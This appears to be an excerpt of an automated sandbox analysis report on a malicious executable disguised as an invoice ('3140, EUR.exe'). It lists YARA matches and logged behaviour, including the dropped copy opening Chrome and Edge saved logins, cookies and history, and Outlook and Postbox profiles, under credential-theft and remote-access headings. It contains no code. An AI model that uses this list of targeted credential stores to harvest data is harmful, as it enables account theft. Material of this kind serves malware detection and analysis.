                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Users\user\Desktop\3140, EUR.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeQueries volume information: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeQueries volume information: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\3140, EUR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 3140, EUR.exe PID: 7180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Users\user\Desktop\3140, EUR.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara matchFile source: 8.2.3140, EUR.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4119574462.000000000043E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 3140, EUR.exe PID: 7180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 3140, EUR.exe PID: 7180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
